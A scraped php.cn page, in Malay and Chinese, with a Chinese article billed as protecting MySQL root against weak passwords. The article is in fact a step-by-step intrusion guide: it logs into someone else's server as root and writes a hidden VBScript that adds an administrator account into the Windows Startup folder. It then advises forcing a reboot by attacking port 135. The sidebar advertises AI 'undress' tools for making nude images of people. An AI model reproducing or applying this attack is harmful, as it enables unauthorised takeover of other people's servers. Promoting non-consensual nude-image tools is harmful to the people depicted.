Rumah pangkalan data tutorial mysql 防止mysql用户root密码弱口令的攻击方法

防止mysql用户root密码弱口令的攻击方法

Jun 07, 2016 pm 05:51 PM
root

文章介绍关于防止mysql用户root密码弱口令的攻击,大家可以看看自己的mysql root是不是也存在这样的安全隐患。

1、连接到对方MYSQL 服务器

-u root -h 192.168.0.1

mysql.exe 这个程序在你安装了MYSQL的的BIN目录中。

2、让我们来看看服务器中有些什么

mysql>show databases; MYSQL默认安装时会有MYSQL、TEST这两个数据库,如果你看到有其它的数据库那么就是用户自建的数据库。

3、让我们进入数据库

mysql>use test; 我们将会进入test数据库中。

4、查看我们进入数据库中有些什么数据表

mysql>show tables; 默认的情况下,test中没有任何表的存在。

以下为关键的部分

5、在TEST数据库下创建一个新的表;

mysql>create table a (cmd text); 好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。

6、在表中插入内容

 代码如下 复制代码

mysql>insert into a values ("set wshshell=createobject (""wscript.shell"" ) " );

mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user 1 1/add"",0) " );

mysql>insert into a values

("b=wshshell.run (""cmd.exe /c net localgroup Administrators 1 /add"",0) " );

注意双引号和括号以及后面的"0"一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!  7、好了,现在我们来看看表a中有些什么

mysql> * from a;我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步

8、输出表为一个VBS的脚本文件

mysql>select * from a into outfile "c:\docume~1\alluse~1\“开始”菜单\程序\启动\a.vbs"; 我们把我们表中的内容输入到启动组中,是一个VBS的脚本文件!注意""符号。

9、看到这大家肯定知道了,就是利用MYSQL输出一个可执行的文件而已。为什么不用BAT呢,因为启动运行时会有明显的DOS窗口出来,而用VBS脚本则可以完全隐藏窗口且不会有错误提示!本来,应该还有一句完成脚本后自动删除此脚本的,但是中文目录实在无法处理,只有作罢!好了,找个工具攻击135让服务器重启吧,几分钟以后你就是管理员了。

总结:不管你什么时候都需要注意自己服务器的安全否则就别谈其它应用程序了,本文章讲述的mysql root密码弱口令的攻击只是安全应用中的冰山一解而己。

Kenyataan Laman Web ini
Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Alat AI Hot

Undresser.AI Undress

Undresser.AI Undress

Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover

AI Clothes Remover

Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool

Undress AI Tool

Gambar buka pakaian secara percuma

Clothoff.io

Clothoff.io

Penyingkiran pakaian AI

AI Hentai Generator

AI Hentai Generator

Menjana ai hentai secara percuma.

Artikel Panas

R.E.P.O. Kristal tenaga dijelaskan dan apa yang mereka lakukan (kristal kuning)
2 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌
Repo: Cara menghidupkan semula rakan sepasukan
1 bulan yang lalu By 尊渡假赌尊渡假赌尊渡假赌
Hello Kitty Island Adventure: Cara mendapatkan biji gergasi
4 minggu yang lalu By 尊渡假赌尊渡假赌尊渡假赌

Alat panas

Notepad++7.3.1

Notepad++7.3.1

Editor kod yang mudah digunakan dan percuma

SublimeText3 versi Cina

SublimeText3 versi Cina

Versi Cina, sangat mudah digunakan

Hantar Studio 13.0.1

Hantar Studio 13.0.1

Persekitaran pembangunan bersepadu PHP yang berkuasa

Dreamweaver CS6

Dreamweaver CS6

Alat pembangunan web visual

SublimeText3 versi Mac

SublimeText3 versi Mac

Perisian penyuntingan kod peringkat Tuhan (SublimeText3)

Log masuk ke Ubuntu sebagai pengguna super Log masuk ke Ubuntu sebagai pengguna super Mar 20, 2024 am 10:55 AM

Dalam sistem Ubuntu, pengguna root biasanya dilumpuhkan. Untuk mengaktifkan pengguna root, anda boleh menggunakan arahan passwd untuk menetapkan kata laluan dan kemudian menggunakan arahan su untuk log masuk sebagai root. Pengguna akar ialah pengguna dengan hak pentadbiran sistem tanpa had. Dia mempunyai kebenaran untuk mengakses dan mengubah suai fail, pengurusan pengguna, pemasangan dan pengalihan keluar perisian, dan perubahan konfigurasi sistem. Terdapat perbezaan yang jelas antara pengguna akar dan pengguna biasa Pengguna akar mempunyai kuasa tertinggi dan hak kawalan yang lebih luas dalam sistem. Pengguna akar boleh melaksanakan perintah sistem yang penting dan mengedit fail sistem, yang tidak boleh dilakukan oleh pengguna biasa. Dalam panduan ini, saya akan meneroka pengguna akar Ubuntu, cara log masuk sebagai akar, dan bagaimana ia berbeza daripada pengguna biasa. Notis

Langkah demi langkah menggunakan Python untuk memadam fail laluan panjang di bawah Windows Langkah demi langkah menggunakan Python untuk memadam fail laluan panjang di bawah Windows Apr 12, 2023 pm 01:31 PM

0x01 Latar belakang artikel Baru-baru ini, storan sistem perniagaan syarikat pengarang menghampiri had, dan pelayan tidak akan dapat dijalankan tidak lama lagi Kerana sistem perniagaan A mengandungi berbilang subsistem A1, A2, A3... Satu, bahagian tengah subsistem ini Disebabkan oleh sebab reka bentuk, semua fail storan disimpan dalam direktori induk yang sama Satu-satunya perbezaan ialah nama fail dan folder yang dijana oleh subsistem yang berbeza bermula dengan nama subsistem. Sebagai contoh, fail yang dijana oleh subsistem A1 semuanya dinamakan A1xxxxxx, dan nama fail yang dijana oleh subsistem A2 semuanya A2xxxxx. Sekarang kita perlu memadamkan fail sejarah beberapa subsistem ini untuk mengosongkan ruang pelayan Berpuluh-puluh terabait data disimpan bersama-sama Pemadaman manual pasti tidak akan muncul.

Apakah perbezaan antara arahan root dan alias dalam konfigurasi Nginx? Apakah perbezaan antara arahan root dan alias dalam konfigurasi Nginx? May 12, 2023 pm 12:16 PM

Kedua-dua akar dan alias boleh ditakrifkan dalam modul lokasi, dan digunakan untuk menentukan laluan sebenar sumber yang diminta, contohnya: lokasi/i/{root/data/w3;} permintaan http://foofish.net/i /top.gif Apabila alamat ini digunakan, sumber sebenar yang sepadan dalam pelayan ialah fail /data/w3/i/top.gif Nota: Laluan sebenar ialah nilai yang ditentukan oleh akar ditambah nilai yang ditentukan oleh lokasi. Dan alias sama seperti namanya Jalan yang ditentukan oleh alias ialah alias lokasi Tidak kira bagaimana nilai lokasi ditulis, laluan sebenar sumber ialah laluan yang ditentukan oleh alias, seperti

Bagaimana untuk menukar nama pengguna root di Linux Bagaimana untuk menukar nama pengguna root di Linux May 18, 2023 pm 07:50 PM

1. Mengambil CentOS sebagai contoh, selepas log masuk, ubah suai /etc/passwd dan /etc/shadow, tukar akar bermula pada baris pertama kepada nama pengguna baharu (seperti admin), dan simpan melalui wq! 2. Selepas pengubahsuaian dan penyimpanan, ia akan berkuat kuasa selepas memulakan semula pelayan Anda boleh menyemak kebenaran fail dan melihat bahawa lajur akaun telah bertukar kepada pentadbir, seperti berikut: Nota: Pengguna lalai dengan kuasa pentadbiran tertinggi di Linux. ialah akar, uid ialah 0. Hanya uid yang diiktiraf dalam sistem, jadi selagi uid adalah 0, sistem itu dianggap sebagai pengguna pentadbiran tertinggi. Walau bagaimanapun, mungkin terdapat masalah tertentu dengan aplikasi Sesetengah perisian menggunakan pengguna akar secara lalai, jadi jika anda mempunyai pemahaman terhad tentang aplikasi perisian,

Kebaikan dan Keburukan Mengakar Telefon Anda Kebaikan dan Keburukan Mengakar Telefon Anda Jul 06, 2023 pm 04:53 PM

Faedah mengakar telefon anda: 1. Anda boleh membuat sandaran sistem; 2. Anda boleh menggunakan program lanjutan; fon sistem, dsb. Kelemahan: 1. Selepas telefon mudah alih di-root, ia mudah diceroboh oleh virus Trojan; 2. Kerosakan sistem mungkin berlaku kerana masalah ketidaklengkapan dan keserasian perisian 3. Selepas telefon bimbit di-root, perisian tersalah memadam fail sistem , menyebabkan ralat sistem; 4. Terdapat risiko privasi pengguna dibocorkan selepas mengakar telefon, dsb.

Cara memasang program Linux tanpa kebenaran root Cara memasang program Linux tanpa kebenaran root Jan 13, 2024 pm 03:27 PM

Untuk sesetengah mesin kongsi, kami mungkin tidak mempunyai keizinan root, jadi ia akan menyusahkan sedikit untuk memasang program Sebenarnya, selagi fail yang berkaitan diletakkan dalam direktori mereka sendiri, sekatan kebenaran root boleh diketepikan. Saya memasang libevent tanpa kebenaran root Hanya tentukan laluan pemasangan ke direktori /home saya melalui awalan: ./configure--prefix=/home/****/libevent--enable-sharedmakemakeinstallmakeverify#libevent test, yang lain Pemasangan mungkin tidak. tersedia.

Bagaimana untuk menetapkan kata laluan untuk root dalam mysql Bagaimana untuk menetapkan kata laluan untuk root dalam mysql May 29, 2023 pm 01:22 PM

Langkah 1: Mula-mula log masuk ke MySQL dan masukkan arahan berikut dalam terminal untuk memasuki konsol MySQL: sudomysql Jika anda digesa untuk kata laluan selepas memasukkan arahan ini, sila masukkan kata laluan pengguna root anda. Langkah 2: Tukar kata laluan Selepas kita memasuki konsol MySQL, kita boleh mula menukar kata laluan pengguna root. Tetapkan kata laluan seperti berikut: ALTERUSER'root'@'localhost'IDENTIFIEDWITHmysql_native_passwordBY'new_password&am

Apakah maksud telefon semasa tidak berakar? Apakah maksud telefon semasa tidak berakar? Sep 19, 2023 pm 02:01 PM

Telefon bimbit semasa tidak berakar, yang bermaksud bahawa sistem pengendalian telefon bimbit itu belum mendapat kebenaran pengguna super Dalam sistem Android, kebenaran root adalah kebenaran tertinggi, yang membolehkan pengguna membuat pengubahsuaian mendalam pada sistem dan. akses fail sistem sensitif Telefon masih dalam keadaan lalai, tiada kebenaran sistem telah diubah suai, yang bermaksud bahawa pengguna tidak boleh terus mengakses dan mengubah suai fail sistem, dan tidak boleh melakukan beberapa operasi sistem lanjutan gunakan fungsi asas telefon mudah alih dan pasang aplikasi seperti biasa. Akan ada sekatan dalam senario khas tertentu.

See all articles